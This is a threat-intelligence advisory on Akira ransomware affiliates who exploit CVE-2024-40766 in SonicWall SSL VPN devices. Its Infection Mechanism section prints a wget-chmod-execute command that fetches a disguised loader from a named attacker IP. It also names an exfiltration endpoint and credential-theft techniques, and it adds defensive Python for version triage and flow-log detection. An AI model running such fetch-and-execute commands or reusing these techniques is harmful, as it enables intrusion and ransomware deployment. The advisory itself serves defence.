Threat Actors Exploiting SonicWall SSL VPN Devices to Deploy Akira Ransomware

In mid-2025, cybersecurity researchers observed a resurgence of threat actors exploiting known vulnerabilities in SonicWall SSL VPN appliances to infiltrate enterprise networks and deploy Akira ransomware. Beginning in July, multiple incidents were reported across North America and the EMEA region, where attackers leveraged unpatched SonicWall devices to gain unauthorized access.

The primary vulnerability exploited was CVE-2024-40766, an improper access control flaw in SonicOS affecting Gen 7 builds up to and including 7.0.1-5035 (older generations have their own affected builds). The flaw is not remote code execution: it lets an unauthenticated attacker reach resources that should require authorization and can crash the firewall. In the Akira intrusions it was paired with SSL VPN accounts managed locally on the appliance rather than in a central directory, where MFA was often not enforced, so that the attacker ended up with a valid VPN session. Once inside the network, adversaries conducted reconnaissance, harvested credentials, and moved laterally before deploying the ransomware payload.
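As an added example (not code from the article or from SonicWall), the following Python parses SonicOS-style firmware strings and flags any build at or below the one Gen 7 threshold this page gives, 7.0.1-5035. The device names, the inventory and the other version strings are constructed for illustration, and the checker deliberately reports "unknown" for generations whose threshold the page does not state instead of guessing one.

```python
import re
from typing import Dict, Optional, Tuple

# Only threshold stated on this page: Gen 7 builds up to and including 7.0.1-5035.
# Gen 5/6 thresholds are not given here, so those generations are reported as
# unknown. Assumption: the leading number of the version is the generation.
LAST_AFFECTED_BY_MAJOR: Dict[int, str] = {7: "7.0.1-5035"}

ParsedVersion = Tuple[Tuple[int, ...], int, str]

# major.minor[.patch[.more]]-build[letter], e.g. 7.0.1-5035 or 6.5.4.14-109n
_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)-(\d+)([A-Za-z]?)$")


def parse_sonicos_version(version: str) -> ParsedVersion:
    """Return (dotted numeric parts, build number, letter suffix).

    Plain tuple comparison on this shape orders versions correctly:
    dotted parts first, then build number, then the optional suffix.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised SonicOS version string: {version!r}")
    dotted, build, suffix = m.groups()
    return tuple(int(p) for p in dotted.split(".")), int(build), suffix.lower()


def is_affected(version: str,
                last_affected_by_major: Dict[int, str] = LAST_AFFECTED_BY_MAJOR) -> Optional[bool]:
    """True if at or below the last affected build of its generation,
    False if newer, None if no threshold is known for that generation."""
    parsed = parse_sonicos_version(version)
    threshold = last_affected_by_major.get(parsed[0][0])
    if threshold is None:
        return None
    return parsed <= parse_sonicos_version(threshold)


def triage_inventory(inventory: Dict[str, str]) -> Dict[str, str]:
    """Classify each device (name -> firmware string) for a patch sweep."""
    labels = {True: "affected", False: "not_affected", None: "unknown"}
    result = {}
    for name, firmware in inventory.items():
        try:
            result[name] = labels[is_affected(firmware)]
        except ValueError:
            result[name] = "invalid"   # malformed record: chase it up, do not ignore it
    return result


# Constructed inventory for demonstration; these are not real devices.
SAMPLE_INVENTORY = {
    "fw-dc1-edge": "7.0.1-5019",
    "fw-dc1-core": "7.0.1-5035",
    "fw-branch-07": "7.1.1-7058",
    "fw-legacy-02": "6.5.4.14-109n",
    "fw-lab": "n/a",
}

if __name__ == "__main__":
    for device, verdict in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{device:14} {SAMPLE_INVENTORY[device]:16} {verdict}")
```

Feed `triage_inventory` the firmware column of a real asset export; anything reported as "unknown" or "invalid" needs a manual look-up against the vendor advisory rather than an assumption that it is safe.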

By August, the frequency of these attacks increased, affecting organizations in sectors such as manufacturing, education, and healthcare. Attackers often exfiltrated sensitive data before initiating encryption processes, transferring files to external SSH endpoints prior to deploying the ransomware.

Analysts identified multiple indicators of compromise, including unusual DCE-RPC requests to the epmapper service and unexpected WinRM sessions to domain controllers, occurring well before ransom notes were delivered. These early signs were linked to the broader Akira ransomware campaign, facilitating rapid incident response and containment.

Akira ransomware, first detected in March 2023, has evolved to target both Windows and Linux systems, including VMware ESXi hosts, enhancing its disruptive potential. Operating under a Ransomware-as-a-Service model, affiliates employ double-extortion tactics, encrypting file systems and threatening to release exfiltrated data publicly.

In each SonicWall SSL VPN compromise, attackers maintained persistence by reusing credentials stolen during the initial intrusion and by abusing the Virtual Office Portal: when the portal is reachable from the internet with default settings, a user who holds a valid password can enrol their own TOTP multi-factor token, so an attacker holding a stolen password can complete MFA enrolment themselves. Because a firmware upgrade does not invalidate passwords, this worked even against devices that had since been patched but whose local SSL VPN accounts had not been reset.

Infection Mechanism:

The initial compromise typically began with exploitation of CVE-2024-40766 on the SonicWall SSL VPN interface. Attackers sent crafted HTTP requests to the vulnerable `login.host` endpoint, bypassing the access controls in front of it. Once a foothold was established, a loader named `vmwaretools` (the name mimics the legitimate VMware Tools package) was downloaded from an attacker-controlled host with a plain `wget`:

```bash
# Fetch the loader from the attacker-controlled host, mark it executable and run it.
# The file name imitates VMware Tools so it looks routine on an ESXi-adjacent host.
wget http://137.184.243.69/vmwaretools -O /tmp/vmwaretools
chmod +x /tmp/vmwaretools
/tmp/vmwaretools
```

This payload installed a loader that registered a backdoor service and harvested administrative credentials via Kerberos PKINIT and UnPAC-the-hash techniques, extracting NTLM hashes without triggering standard credential audit logs.

After credential extraction, operators moved laterally, using RDP to reach Windows hosts and SSH to reach ESXi servers (ESXi exposes SSH, not RDP), exfiltrated data over SSH to the endpoint 66.165.243.39, and then executed the ransomware binary on both Windows and ESXi hosts.

To stay quiet, the loader disabled local logging, and the operators relied on tools that blend in with routine administration: WinRM for remote command execution and Rclone for bulk data transfer. By the time encryption began, they had already secured future access through the backdoored services and the stolen credentials.

Recommendations:

Organizations are urged to take the following actions to mitigate the risk of such attacks:

1. Apply Patches: Ensure that all SonicWall devices run firmware that includes the fixes released in August 2024 for CVE-2024-40766, and, because credentials stolen before the upgrade remain valid afterwards, reset the passwords of locally managed SSL VPN accounts at the same time.

2. Enforce Credential Hygiene: Implement strict password policies, regularly update credentials, and monitor for unauthorized access attempts.

3. Monitor Network Traffic: Keep an eye on anomalous external SSH traffic and unusual DCE-RPC, WinRM, and certificate download events, which can serve as early indicators of compromise.

4. Restrict Access: Limit the Virtual Office Portal, the SSL VPN interface and other management services to trusted source IP addresses, do not expose the portal to the internet where it is not needed, and enforce multi-factor authentication on every SSL VPN account, local accounts included.

5. Incident Response Planning: Develop and regularly update incident response plans to ensure rapid containment and remediation in the event of a security breach.
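The early indicators described in the analysis above and restated in recommendation 3 (DCE-RPC requests to the endpoint mapper, WinRM sessions to domain controllers, outbound SSH to external hosts) are straightforward to encode as flow-log rules. The following Python is an added example, not tooling from the article or from the researchers it cites: it runs those behavioural rules plus a watchlist of the two IP addresses the article names over a few constructed Zeek-style connection records. The internal host addresses, the sets of domain controllers and admin jump hosts, the column layout and the upload-size threshold are all assumptions to be replaced with your own environment's values.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Set

# Constructed flow records in a Zeek conn.log-like layout (not real telemetry):
# ts  src  dst  dst_port  proto  service  orig_bytes
SAMPLE_FLOWS = """\
1722340800.1\t10.20.5.17\t10.20.1.10\t135\ttcp\tdce_rpc\t2048
1722340801.4\t10.20.5.17\t10.20.1.10\t5985\ttcp\thttp\t15360
1722340830.9\t10.20.5.17\t66.165.243.39\t22\ttcp\tssh\t734003200
1722340900.0\t10.20.9.50\t10.20.1.10\t389\ttcp\tldap\t512
1722340950.2\t10.20.0.5\t10.20.1.10\t5985\ttcp\thttp\t4096
"""

DOMAIN_CONTROLLERS: Set[str] = {"10.20.1.10"}     # assumption: this site's DCs
ADMIN_JUMP_HOSTS: Set[str] = {"10.20.0.5"}        # assumption: hosts expected to use WinRM/RPC
IOC_IPS: Set[str] = {"137.184.243.69", "66.165.243.39"}   # addresses named in the article
LARGE_UPLOAD_BYTES = 100 * 1024 * 1024            # assumption: tune to the environment


@dataclass
class Flow:
    ts: float
    src: str
    dst: str
    dst_port: int
    proto: str
    service: str
    orig_bytes: int


@dataclass
class Alert:
    rule: str
    src: str
    dst: str
    detail: str


def parse_flows(text: str) -> List[Flow]:
    """Parse tab-separated records; blank lines and '#' comments are skipped."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, port, proto, service, obytes = line.split("\t")
        flows.append(Flow(float(ts), src, dst, int(port), proto, service, int(obytes)))
    return flows


def is_external(ip: str) -> bool:
    """True for routable public addresses; private, loopback and link-local are internal."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def detect(flows: Iterable[Flow],
           domain_controllers: Set[str] = DOMAIN_CONTROLLERS,
           admin_hosts: Set[str] = ADMIN_JUMP_HOSTS,
           ioc_ips: Set[str] = IOC_IPS) -> List[Alert]:
    """Apply the article's early-warning indicators to each flow in order."""
    alerts: List[Alert] = []
    for f in flows:
        trusted_source = f.src in admin_hosts
        # Endpoint-mapper (DCE-RPC, TCP 135) lookups from a workstation are
        # reconnaissance or lateral movement, not normal user traffic.
        if f.dst_port == 135 and not trusted_source:
            alerts.append(Alert("dcerpc_epmapper", f.src, f.dst,
                                "endpoint-mapper lookup from a non-admin host"))
        # WinRM (5985/5986) to a domain controller from anything but a jump host.
        if f.dst_port in (5985, 5986) and f.dst in domain_controllers and not trusted_source:
            alerts.append(Alert("winrm_to_dc", f.src, f.dst,
                                "WinRM session to a domain controller from a non-admin host"))
        # Outbound SSH to a public address: the exfiltration channel the article describes.
        if f.dst_port == 22 and is_external(f.dst):
            size = f"{f.orig_bytes} bytes sent to external SSH endpoint"
            if f.orig_bytes >= LARGE_UPLOAD_BYTES:
                size += " (large upload)"
            alerts.append(Alert("external_ssh", f.src, f.dst, size))
        # Plain watchlist match on the infrastructure the article names.
        if f.dst in ioc_ips:
            alerts.append(Alert("ioc_match", f.src, f.dst, "destination on the Akira IOC list"))
    return alerts


if __name__ == "__main__":
    for a in detect(parse_flows(SAMPLE_FLOWS)):
        print(f"{a.rule:16} {a.src} -> {a.dst}: {a.detail}")
```

The behavioural rules fire on the sample well before any ransom note would appear, which is the window the analysts describe; the watchlist rule is the weakest of the four, since the addresses change between campaigns, so keep it but do not rely on it alone.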

By proactively addressing these vulnerabilities and implementing robust security measures, organizations can significantly reduce the risk of ransomware attacks and protect their critical assets.